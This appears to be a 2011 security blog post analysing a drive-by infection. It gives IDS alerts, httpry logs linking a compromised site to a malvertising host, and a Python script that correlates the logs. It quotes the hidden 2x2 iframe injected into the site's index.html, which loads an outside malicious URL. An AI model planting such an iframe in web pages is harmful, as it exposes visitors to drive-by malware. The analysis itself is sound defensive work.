Wednesday, June 15, 2011

Drive by #1

IDS hits..yay
06/14-12:34:57.964011 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:05.076928 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:35.705572 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:48.121428 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:52.852374 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80

httpry
www.markandchappell.com 194.125.149.132 http://www.markandchappell.com/us/index.html
indometastan.in 195.43.94.64 http://indometastan.in/in.cgi?default

Malicious iFrame on the end of index.html
<iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'>
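
The triage above (repeated IDS alerts, then httpry to put a hostname and URL on the alerting IP) can be scripted. This is an added example, not from the original post: it collapses the Snort fast-format alerts per signature and destination and joins them to the httpry lines by server IP. The function names and the three-column httpry layout are assumptions taken from how the lines appear here.

```python
import re

# Log lines copied from the post; "int.ip" is the author's redaction of the client.
ALERTS = """\
06/14-12:34:57.964011 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:05.076928 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:35.705572 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:48.121428 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:52.852374 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
"""
HTTPRY = """\
www.markandchappell.com 194.125.149.132 http://www.markandchappell.com/us/index.html
indometastan.in 195.43.94.64 http://indometastan.in/in.cgi?default
"""

# Snort "fast" alert: timestamp, [gid:sid:rev], message, then {PROTO} src:port -> dst:port
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[\d+:(?P<sid>\d+):\d+\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*\{\w+\}\s+(?P<src>\S+):(?P<sport>\d+)\s+->\s+(?P<dst>\S+):(?P<dport>\d+)\s*$")

def parse_httpry(text):
    # "host ip url" per line, as shown in the post -> {ip: [(host, url), ...]}
    seen = {}
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) == 3:
            seen.setdefault(parts[1], []).append((parts[0], parts[2]))
    return seen

def correlate(alert_text, httpry_text):
    # Collapse repeated alerts per (sid, dst IP) and attach the HTTP host/URL for that IP.
    http, out = parse_httpry(httpry_text), {}
    for line in alert_text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue  # ignore anything that is not a fast-format alert line
        row = out.setdefault((m["sid"], m["dst"]), {
            "msg": m["msg"], "count": 0, "first": m["ts"], "last": m["ts"],
            "src_ports": set(), "http": http.get(m["dst"], [])})
        row["count"] += 1
        row["last"] = m["ts"]
        row["src_ports"].add(int(m["sport"]))
    return out

if __name__ == "__main__":
    for (sid, dst), r in correlate(ALERTS, HTTPRY).items():
        print(f"sid {sid} -> {dst}: {r['count']} hits {r['first']}..{r['last']}, "
              f"client ports {sorted(r['src_ports'])}, requests {r['http']}")
```

The two distinct client ports show the five alerts came from two TCP connections to the same server, not five separate page loads.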
